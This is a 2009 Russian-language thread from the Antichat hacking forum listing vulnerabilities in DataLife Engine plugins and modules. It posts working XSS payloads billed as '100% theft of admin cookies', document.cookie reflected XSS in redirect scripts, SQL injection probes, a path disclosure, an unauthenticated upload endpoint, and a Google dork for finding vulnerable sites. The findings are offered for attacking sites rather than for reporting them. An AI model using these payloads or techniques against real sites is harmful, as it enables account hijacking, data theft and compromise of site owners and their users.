Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

27.02.2009, 17:18
|
|
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме: 3250478
Репутация:
999
|
|
hacking attemptz
Версия: v.1.0
Активная XSS от любого пользователя(100% кража куки админа)
Уязвимый скрипт: hacking_attemptz_fnct.php
Запрос: login_name=<h1><script>alert(/xss/);</script>XSS</h1>&login_password=1234
Метод: POST
Уязвимый кусок кода:
PHP код:
function log_user($host)
{
global $ip;
$log_date = date('d.m.Y');
$log_time = date('H:i:s');
$log_info = "
<tr>
<td align='center'>".$_POST['login_name']."</td>
<td align='center'>$log_date</td>
<td align='center'>$log_time</td>
<td align='center'>$ip</td>
<td align='center'>".gethostbyaddr($ip)."</td>
</hr>
";
Теперь попробуйте залогиниться с логином <h1>xss</h1> и любым пассом!
Смотрим админку, и вот! XSS видна
|
|
|

27.02.2009, 17:29
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме: 5321514
Репутация:
3313
|
|
Сообщение от -Hormold-
SPAM BUTTON in PM
Версия: v.1.0
ВОЗМОЖНО Sql-INJ
Уязвимый скрипт: engine\inc\pmspam.php
Запрос: flag=-1'
Метод: POST
Уязвимый кусок кода:
PHP код:
if($_POST['spam_flag'])
{
foreach ($_POST['spam_flag'] as $key => $value)
{
$delete_spam_query = "DELETE FROM " . PREFIX . "_spam_pm WHERE id = '$value'";
$delete_spam_query_id = $db->query($delete_spam_query);
if(!$delete_spam_query)
{
$spam_err = true;
}
}
}
Что значит возможно?
|
|
|

27.02.2009, 18:02
|
|
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме: 3250478
Репутация:
999
|
|
Friends of Suite
Версия: v.1.3
Расскрытие путей
Уязвимый скрипт: inc/friend.php
Запрос: reg_name[]=123®_adress[]=1234
Метод: POST
Уязвимый кусок кода:
PHP код:
if ($_POST['docreate'] == "create")
{
$name = trim(htmlspecialchars(stripslashes($_POST['name'])));
$address = trim(htmlspecialchars(stripslashes($_POST['address'])));
|
|
|

27.02.2009, 18:08
|
|
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме: 3250478
Репутация:
999
|
|
Friends of Suite
Версия: v.1.3
Активная XSS от любого пользователя(100% кража куки админа)
Уязвимый скрипт: friend.php
Запрос: reg_name=<h1><script>alert(/xss/);</script>XSS</h1>®_adress=http://127.0.0.1/
Метод: POST
Уязвимый кусок кода:
Теперь попробуйте добавить сайт с названием <h1>xss</h1> и любым url'ом где есть ссылка на ваш хост.
Смотрим админку, и вот! XSS видна :P
Хотя script удаляет...
Последний раз редактировалось -Hormold-; 27.02.2009 в 18:16..
|
|
|

28.02.2009, 00:40
|
|
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме: 3250478
Репутация:
999
|
|
DataLife Engine Redirect
Версия: v.1.1
XSS
Уязвимый скрипт: engine/redirect.php
Запрос: url=http://site.su"><script>alert(document.cookie);</script>
Метод: GET
Уязвимый кусок кода:
PHP код:
$url = (isset($_GET['url']) && (!empty($_GET['url']))) ? trim($_GET['url']) : @header('Location: /index.php');
Переадресация для ссылок(^^ странно похожи...)!
Версия: v.1.0
XSS
Уязвимый скрипт: engine/redikt.php
Запрос: ?url=http://sasa.su"><script>alert(document.cookie);</script>
Метод: GET
Уязвимый кусок кода:
PHP код:
$url = (isset($_GET['url']) && (!empty($_GET['url']))) ? trim($_GET['url']) : @header('Location: /index.php');
Последний раз редактировалось -Hormold-; 28.02.2009 в 00:47..
|
|
|

01.03.2009, 22:09
|
|
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме: 3250478
Репутация:
999
|
|
Удаление комментариев при помощи AJAX
Версия: v.1.0
sql-inj
Уязвимый скрипт: engine/ajax/commentdelete.php
Запрос: commid=-1'
Метод: GET
Уязвимый кусок кода:
PHP код:
$row = $db->super_query("SELECT * FROM " . PREFIX . "_comments where id = '{$_REQUEST['commid']}'");
Раскручивать не стал...
|
|
|

09.04.2009, 13:13
|
|
Участник форума
Регистрация: 04.03.2009
Сообщений: 298
Провел на форуме: 1241030
Репутация:
229
|
|
По адресу site/engine/images.php?area=
Можно заливать картинки на сервер без авторизации
Проверял на 6.7 - пашет
Последний раз редактировалось Jokester; 31.03.2010 в 19:59..
|
|
|

09.05.2009, 17:08
|
|
Новичок
Регистрация: 16.02.2009
Сообщений: 10
Провел на форуме: 390969
Репутация:
8
|
|
Расскажите можна будет,как нибудь заюзать уязвимость в модуле "Переходы"...?
Когда например в гугле воодишь запрос с ковычкой, то при переходе :
MySQL Error!
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'vBulletin', '/', '%main%', 'ip', 'engine')' at line 1
Error Number:
1064
|
|
|

09.05.2009, 17:15
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Сообщение от Sosok
Расскажите можна будет,как нибудь заюзать уязвимость в модуле "Переходы"...?
Когда например в гугле воодишь запрос с ковычкой, то при переходе :
MySQL Error!
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'vBulletin', '/', '%main%', 'ip', 'engine')' at line 1
Error Number:
1064
покажи подробнее, линком желательно
|
|
|

10.05.2009, 12:18
|
|
Новичок
Регистрация: 16.02.2009
Сообщений: 10
Провел на форуме: 390969
Репутация:
8
|
|
Вот зайдёшь и на самый первый сайт нажми...
http://www.google.com/search?client=opera&rls=ru&q=site:scriptiks.ru+'
Последний раз редактировалось Sosok; 10.05.2009 в 12:27..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|